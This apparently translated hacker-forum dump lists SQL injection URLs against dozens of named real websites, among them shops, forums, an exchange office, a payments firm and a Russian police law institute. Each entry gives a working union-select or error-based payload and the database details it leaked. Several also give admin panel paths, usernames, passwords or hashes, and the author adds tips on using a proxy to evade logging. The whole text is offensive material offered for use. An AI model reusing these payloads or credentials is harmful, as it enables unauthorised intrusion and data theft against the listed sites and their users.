http://www.dreptonline.ro/stiri/detaliu_stire.php?id_stire=-652+union+select+1,2,3,4,5 ,6,7/* version :4.1.22-standard user: dreptonl_dr@localhost database: dreptonl_dr
http://www.oferta9.ro/magazin2.php?m=-1951+union+sele ct+1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5/* version :5.0.45-community user : mn76_iuser@localhost database: mn76_iuser
George Soros's site http://www.osf.ro/ro/program.php?program=-30+union+select+1,2, 3,4,5,6/* version: 4.0.18 user: sitenou@localhost database: site2007
http://www.gans-club.ru/catalogue.php?id=-1+union+select+1,2,3,5,6,7/* version: 5.0.24-standard user: gansclub1@localhost db: db_gansclub1 http://www.gans-club.ru/admin/ The admin is a sucker....muhahaha P.S.: As soon as I saw how much their cigs cost, I decided right away: have to break it)))
http://www.atur.com.ua/index.php?id=-903+union+select+1,2,3,4,5,6+from+users/* atur@localhost 4.1.22 atur
Some kind of game) Traffic is 0. Code: http://g1.rezni.net/forum/post.php?a=new_post&forum=-1+UNION+SELECT+null,concat(login,':',pass),null,null+From+users+limit+0,1/* rezninet_sred@localhost 4.1.21 rezninet_game
Online game World of Gladiators http://sotovikmar.nov.ru/forum/post.php?a=new_post&forum=-1+union+select+1,concat_ws(char(58),name,pass),3,4+from+users+limit+1+offset+2/* kaskara_sotm@localhost 4.1.21-standard kaskara_sotm
http://www.agarev.com/website.php?id=-1+union+select+1,lgn,pswd,4+from+agrv_user/* The output is at the very bottom, under the banners!
E-Shop: one is almost fully worked out, the others are not, I simply did not have time; decided to post them so they would not lie around unused, so here we go: http://www.quicktech.com.tw/eshop_en/class_b.asp?ID=47' = [Microsoft][ODBC SQL Server Driver][SQL Server]? nvarchar ?? 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' = DB-'DataSQL_eshop_EN' tables and fields: AD AdMail Classl Employees News QA ActionCount ADRecord ClassII comd_list Company D99_CMD D99_Tmp dtproperties EditRecord GroupMember LoginRecord Member(ID,GID,MemberType,UserName,PassWord,Name,PetName,Sex,Phone,Birthday,Mobile,EMail,Address,Memo1,Memo2) OrderRecord Orders Porduct sysconstraints syssegments t_jiaozhu Not worked out; attention: on some of them MySQL error logs are written, go in only through a proxy:
Here's a pack -)
I'll add more later http://www.ukrbiznes.com/website.php?id=66551+union+select+version(),2,3,4,5,6,7,8,9,0,1,2/* - for whoever is not too lazy to bypass the filtering... 12 tables ... ! http://www.ukrnic.com/hosting_info.php?id=2+union+select+1,2,version()/*
===============================================================================================================
http://www.zcasher.info/products.php?id=4'+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables/* WMZ exchange office; the tables are below, I picked out everything related to users: cap_partners cap_users exch_clients zmc2_adminusers zmc2_users uab_partners
===============================================================================================================
http://www.flipskateboards.com/news.php?id=-9999'+union+select+table_name,column_name+from+information_schema.columns+limit+264,1/* http://www.flipskateboards.com/admin/ login/pass: arjan ---------------- http://www.classicalsource.com/db_control/db_cd_review.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,id,password,user_name,15,16,17,18,19,20,21,22,23+from+user+limit+0,1/* http://www.classicalsource.com/admin/site_admin.php login: davef pass: qpd45122
http://www.infra-m.ru/live/news.asp?date=03.03.2008&id=471468+or+1=@@version-- SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) //****************************** http://www.rkgarant.ru/news.asp?id=376+or+1=@@version-- 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 1) http://www.rkgarant.ru/news.asp?id=376+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+TOP+32+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(0x2345)))-- users table
aiman.eu Code: http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database()),5,6,7,8,9,10/* 4.0.27-max-log[email protected]db161593031 Code: http://www.aiman.eu/index.php?id=-1+union+select+1,2,3,concat(login,0x3,pass),5,6,7,8,9,10+from+admin/* aimanff8ac4f495af20f4a7c63d4644d568b5:schmann Admin panel: http://www.aiman.eu/admin/
http://www.atlasmonde.net/pays.php?idp=-1+union+select+1,2,3,table_name,5,6,7,8,9,0,1,2,3,4,5,6,7+from+in formation_schema.tables+limit+18,1/* version: 5.0.22 user : altasmonde_user@localhost database : altasmonde_base
Internet trading http://www.netinvestor.ru/news.asp?id=851142+or+1=@@VERSION 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) Users and passwords http://www.netinvestor.ru/news.asp?id=851142+or+1=(SELECT+TOP+1+password+from+usertable+WHERE+password+NOT+IN+(SELECT+TOP+10+password+from+usertable+WHERE+password+NOT+IN+(0x23)))--
http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,table_name,5,6, 7,8+from+information_schema.tables+l imit+16,1/* the table we need http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,column_name,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e/* 0x61646d696e = admin http://www.comeniuskft.hu/main.php?kozepre=kereskedelmi&kategoria=-7+union+select+1,2,3,concat_ws(0x3a,nick,password),5,6,7,8+from+admin/* that is basically everything that is needed.... oh yes, I completely forgot http://www.comeniuskft.hu/admin.php
http://www.win-developers.com/forum/show.asp?id=606&fid=178++or+1=@@version-- 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.motorcitysuns.com/team.php?id=-1+union+sel ect+1,,2, 3,4/* version: 4.1.22-standard-log user : oaklands_1@localhost database : oaklands_1
fexco.com the global payments group Code: http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,concat_ws(0x3203a20,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/* version: 5.0.45-community-log user: [email protected] database: splashg_fexco Code: http://www.fexco.com/viewjob.php?id=-105+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+1,1/*
Rostov Law Institute of the Ministry of Internal Affairs of Russia http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=@@version-- 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) http://www.rui.rsd.ru/print/news.asp?newsId=5698+or+1=(select%20db_name())-- DB- rui User-SITE\IUSR_WEB3